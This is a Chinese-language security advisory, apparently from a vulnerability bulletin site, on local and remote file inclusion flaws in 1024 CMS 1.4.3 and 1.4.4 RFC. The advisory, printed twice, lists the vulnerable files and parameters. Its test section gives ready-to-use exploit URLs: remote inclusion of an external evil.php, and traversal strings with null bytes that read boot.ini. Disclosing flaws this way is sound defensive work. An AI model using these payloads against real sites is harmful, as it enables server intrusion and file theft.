1024 CMS多个文件包含漏洞
发布日期:2008-07-04
更新日期:2008-07-08
受影响系统:
Treble Designs 1024 CMS 1.4.4 RFC
Treble Designs 1024 CMS 1.4.3
描述:BUGTRAQ ID: 30091
1024是基于PHP和MySQL的内容管理系统。
1024 CMS中存在多个文件包含漏洞,允许恶意用户泄露敏感信息或入侵有漏洞的系统。
1) themes/blog/layouts/standard.php、themes/default/layouts/standard.php、themes/portfolio/layouts/standard.php和themes/snazzy/layouts/standard.php文件中没有正确地验证对page_include参数的输入便用于包含文件,这可能导致包含本地或外部资源的任意文件。成功攻击要求打开了register_globals。
2) 多个文件没有正确的验证对各种参数的输入便用于包含文件,这可能导致包含本地资源的任意文件。成功攻击要求禁用了magic_quotes_gpc。以下是受影响的参数和文件。
theme_dir和page参数:
themes/blog/layouts/standard.php
themes/default/layouts/standard.php
themes/portfolio/layouts/standard.php
themes/snazzy/layouts/standard.php
themes/blog/layouts/total.php
themes/default/layouts/total.php
themes/portfolio/layouts/total.php
themes/snazzy/layouts/total.php
lang参数:
admin/lang/fr/reports/default.php
lang/en/moderator/default.php
lang/fr/moderator/default.php
lang/de/moderator/default.php
admin_theme_dir参数:
admin/ops/admins/default.php
admin/ops/reports/ops/download.php
admin/ops/reports/ops/forum.php
admin/ops/reports/ops/news.php
theme_dir参数:
pages/download/default/ops/add.php
pages/download/default/ops/edit.php
pages/download/default/ops/newest.php
pages/download/default/ops/search.php
pages/download/default/ops/top.php
pages/forum/default/content.php
themes/blog/layouts/basic_footer.php
themes/default/layouts/basic_footer.php
themes/portfolio/layouts/basic_footer.php
themes/snazzy/layouts/basic_footer.php
themes/blog/layouts/basic_header.php
themes/default/layouts/basic_header.php
themes/portfolio/layouts/basic_header.php
themes/snazzy/layouts/basic_header.php
page、page_include和theme_dir参数:
themes/blog/layouts/print.php
themes/default/layouts/print.php
themes/portfolio/layouts/print.php
themes/snazzy/layouts/print.php
<*来源:Digital Security
链接:http://marc.info/?l=bugtraq%26amp;m=121519055217560%26amp;w=2
*>
测试方法:<font color='#FF0000'><p align='center'>警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font>http://www.example.com/[installdir]/themes/blog/layouts/standard.php?page_include=http://www.example.com/evil.php
http://www.example.com/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/lang/fr/reports/default.php?t=news%26amp;amp;lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/admins/default.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/en/moderator/default.php?t=news%26amp;amp;lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/fr/moderator/default.php?t=download%26amp;amp;lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/de/moderator/default.php?t=forum%26amp;amp;lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/add.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/newest.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/forum/default/content.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00
建议:厂商补丁:
Treble Designs
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.1024cms.com/
发布日期:2008-07-04
更新日期:2008-07-08
受影响系统:
Treble Designs 1024 CMS 1.4.4 RFC
Treble Designs 1024 CMS 1.4.3
描述:BUGTRAQ ID: 30091
1024是基于PHP和MySQL的内容管理系统。
1024 CMS中存在多个文件包含漏洞,允许恶意用户泄露敏感信息或入侵有漏洞的系统。
1) themes/blog/layouts/standard.php、themes/default/layouts/standard.php、themes/portfolio/layouts/standard.php和themes/snazzy/layouts/standard.php文件中没有正确地验证对page_include参数的输入便用于包含文件,这可能导致包含本地或外部资源的任意文件。成功攻击要求打开了register_globals。
2) 多个文件没有正确的验证对各种参数的输入便用于包含文件,这可能导致包含本地资源的任意文件。成功攻击要求禁用了magic_quotes_gpc。以下是受影响的参数和文件。
theme_dir和page参数:
themes/blog/layouts/standard.php
themes/default/layouts/standard.php
themes/portfolio/layouts/standard.php
themes/snazzy/layouts/standard.php
themes/blog/layouts/total.php
themes/default/layouts/total.php
themes/portfolio/layouts/total.php
themes/snazzy/layouts/total.php
lang参数:
admin/lang/fr/reports/default.php
lang/en/moderator/default.php
lang/fr/moderator/default.php
lang/de/moderator/default.php
admin_theme_dir参数:
admin/ops/admins/default.php
admin/ops/reports/ops/download.php
admin/ops/reports/ops/forum.php
admin/ops/reports/ops/news.php
theme_dir参数:
pages/download/default/ops/add.php
pages/download/default/ops/edit.php
pages/download/default/ops/newest.php
pages/download/default/ops/search.php
pages/download/default/ops/top.php
pages/forum/default/content.php
themes/blog/layouts/basic_footer.php
themes/default/layouts/basic_footer.php
themes/portfolio/layouts/basic_footer.php
themes/snazzy/layouts/basic_footer.php
themes/blog/layouts/basic_header.php
themes/default/layouts/basic_header.php
themes/portfolio/layouts/basic_header.php
themes/snazzy/layouts/basic_header.php
page、page_include和theme_dir参数:
themes/blog/layouts/print.php
themes/default/layouts/print.php
themes/portfolio/layouts/print.php
themes/snazzy/layouts/print.php
<*来源:Digital Security
链接:http://marc.info/?l=bugtraq%26amp;m=121519055217560%26amp;w=2
*>
测试方法:<font color='#FF0000'><p align='center'>警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font>http://www.example.com/[installdir]/themes/blog/layouts/standard.php?page_include=http://www.example.com/evil.php
http://www.example.com/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/lang/fr/reports/default.php?t=news%26amp;amp;lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/admins/default.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/en/moderator/default.php?t=news%26amp;amp;lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/fr/moderator/default.php?t=download%26amp;amp;lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/lang/de/moderator/default.php?t=forum%26amp;amp;lang=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/add.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/download/default/ops/newest.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/pages/forum/default/content.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://www.example.com/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00
建议:厂商补丁:
Treble Designs
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.1024cms.com/